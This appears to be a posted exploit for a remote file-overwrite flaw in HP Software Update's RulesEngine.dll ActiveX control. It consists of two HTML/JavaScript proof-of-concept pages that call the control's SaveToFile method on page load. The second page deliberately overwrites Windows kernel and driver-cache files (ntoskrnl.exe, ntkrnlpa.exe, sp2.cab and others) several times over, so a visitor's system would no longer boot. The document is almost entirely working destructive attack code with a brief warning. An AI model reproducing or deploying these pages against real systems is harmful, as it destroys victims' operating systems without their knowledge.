HP Software Update RulesEngine.dll控件远程文件覆盖漏洞

////////////////////////////////////////// //Remote Arbitrary File Corruption Exploit ////////////////////////////////////////// <html> <head> <script language="JavaScript"> var filePath="c:\\temp\\testfile.txt"; function spawn3() { o2obj.SaveToFile(filePath); } </script> </head> <body onload="spawn3()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> </html> //////////////////////////////// //Remote Kernel Wreckage Exploit //////////////////////////////// // // // WARNING! THE REAL THING... // DON'T TRY THIS AT HOME! // THIS WILL DAMAGE YOUR // HP COMPUTER SYSTEM!!! // // //////////////////////////////// <html> <head> <script language="JavaScript"> function spawn3() { o2obj.EvaluateRules(); o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe"); o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe"); o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe"); o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe"); o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe"); o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab"); o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab"); } function meltdown() { spawn3(); spawn3(); spawn3(); } </script> </head> <body onload="meltdown()"> <object ID="o2obj" WIDTH=0 HEIGHT=0 classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D" </object> </body> </html>